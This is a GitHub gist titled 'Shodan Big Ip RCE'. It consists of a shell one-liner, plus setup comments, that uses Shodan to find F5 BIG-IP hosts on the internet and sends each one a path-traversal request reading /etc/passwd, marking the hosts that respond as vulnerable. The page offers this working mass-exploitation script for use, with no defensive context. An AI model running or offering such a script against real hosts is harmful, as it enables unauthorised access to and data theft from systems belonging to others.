Skip to content

Instantly share code, notes, and snippets.

@Mad-robot
Last active January 7, 2024 01:54
Show Gist options
  • Save Mad-robot/e8c5a81c87d14c7fe0413be2e912141f to your computer and use it in GitHub Desktop.
Save Mad-robot/e8c5a81c87d14c7fe0413be2e912141f to your computer and use it in GitHub Desktop.
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment